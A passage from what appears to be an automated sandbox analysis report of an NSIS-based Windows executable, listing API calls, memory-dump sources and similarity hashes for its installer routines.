                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                        • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                        • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                        • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73B022D8,?,00000808), ref: 73B016D5
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73B022D8,?,00000808), ref: 73B016DC
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73B022D8,?,00000808), ref: 73B016F0
                                                        • GetProcAddress.KERNEL32(73B022D8,00000000), ref: 73B016F7
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B01700
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                        • String ID:
                                                        • API String ID: 1148316912-0
                                                        • Opcode ID: 135bacea1ac9a883109723458246a3c2b66d5e29a96c556a3b0d13e8614fea39
                                                        • Instruction ID: efa817c108a7a15fbb93065af3af4ebe1fd5a9834649f6e624332ca0e8961256
                                                        • Opcode Fuzzy Hash: 135bacea1ac9a883109723458246a3c2b66d5e29a96c556a3b0d13e8614fea39
                                                        • Instruction Fuzzy Hash: 04F012731061387BD63026A79D4CD9B7E9CDF9B2F9B110215F71CA21A095614C01DBF1
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                        • Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
                                                        • Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                        • Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                        • wsprintfW.USER32 ref: 00404E4D
                                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                        • Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
                                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                        • Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
                                                        APIs
                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                        • CharNextW.USER32(00000000), ref: 00405F04
                                                        • CharNextW.USER32(00000000), ref: 00405F1C
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsj924C.tmp, xrefs: 00405EF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        • API String ID: 3213498283-1453126546
                                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                        • Instruction ID: 0a1f1b5a9c7109d9782da40e5c64a20d368bd089a9add51530d5bf68f03dfa04
                                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                        • Instruction Fuzzy Hash: 98F09062D00A2795DA31B7645C85A7766BCEB593A0B00807BE601B72C0D7BC48818EDA
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E4C
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E56
                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E68
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-1881609536
                                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction ID: f2f0f64a112d89f35c11d852d44423d34ca235ab8761dbed5ccf1744ff487032
                                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction Fuzzy Hash: C2D05E31101534AAC6116F54AD04DDB62AC9E46384381483BF541B20A5C778595186FD
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73B01171
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73B011E3
                                                        • GlobalFree.KERNEL32 ref: 73B0124A
                                                        • GlobalFree.KERNEL32(?), ref: 73B0129B
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B012B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: f6a3bddd22c0bbebc8df5864dd03b1bd1767cce3603f019ce7195db68a8f801b
                                                        • Instruction ID: 61a6eae1d9ecbcdbe176116bf81c7083dba21d72eeb5fe803d49bd01190666b1
                                                        • Opcode Fuzzy Hash: f6a3bddd22c0bbebc8df5864dd03b1bd1767cce3603f019ce7195db68a8f801b
                                                        • Instruction Fuzzy Hash: B55171FA9043059FE719DF65CA84B1A7BB8FB94318B144126F94ADBA50F734E910CF50
                                                        APIs
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 004026BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp$C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll
                                                        • API String ID: 1659193697-1588490679
                                                        • Opcode ID: 16bcd07f8b696e8d4d77bdf42abac6a8be44450ddb0260aebc576801c6c870aa
                                                        • Instruction ID: 2d8dd356423beb748054ff885628a6ea3dfbd93006732d19d47d72bde2aed11d
                                                        • Opcode Fuzzy Hash: 16bcd07f8b696e8d4d77bdf42abac6a8be44450ddb0260aebc576801c6c870aa
                                                        • Instruction Fuzzy Hash: 3C11EB71A00315ABCB106FB19E466AE7761AF40748F21443FF502B71C1EAFD8891676E
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                        • GetTickCount.KERNEL32 ref: 0040306F
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                        • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                        • Instruction ID: e0f0fd039426b51c9db09d8e0aed7b7b9f53d87474512ec8403aba9b2c913b41
                                                        • Opcode Fuzzy Hash: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                        • Instruction Fuzzy Hash: 93F05470602A21ABC6216F50FE09A9B7B69FB45B12B41043AF545B11ACCB384891CB9D
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040559F
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                          • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                        • Instruction ID: f144bc20a23b2fc1dad06cc698734642626ca736bc3518a3bbd7873959a32aa8
                                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                        • Instruction Fuzzy Hash: 21017171100608BBDF219F11DD84A9F376BEB84794F204037FA027A1D9C7398D529A69
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,756F3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B8C,00403AA2,?,?,00000008,0000000A,0000000C), ref: 00403BCE
                                                        • GlobalFree.KERNEL32(005993D0), ref: 00403BD5
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403BB4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-1881609536
                                                        • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                        • Instruction ID: 378dd3650374f781d23bf779db5809bbac3881e8a2166d277484928c36cee721
                                                        • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                        • Instruction Fuzzy Hash: 20E08C336204205BC6311F15AE05B1A77786F89B2AF01402AE8407B2628BB47C528FC8
                                                        APIs
                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405E98
                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405EA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-4267323751
                                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction ID: f09b3c5ebc87e5286f4ae90cf2a9e4f9baad7a67d9a69d6c991adc66958b5f71
                                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction Fuzzy Hash: 40D05EB28019209ED3226B04EC0499F73A8EF123107868826E980A61A5D7785D818AEC
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                        • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                        • Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
                                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                        • Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68
                                                        APIs
                                                        • SetErrorMode.KERNEL32 ref: 00403575
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                        • OleInitialize.OLE32(00000000), ref: 00403690
                                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                        • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                        • GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                        • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                        • lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                        • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                        • lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                        • DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                        • lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
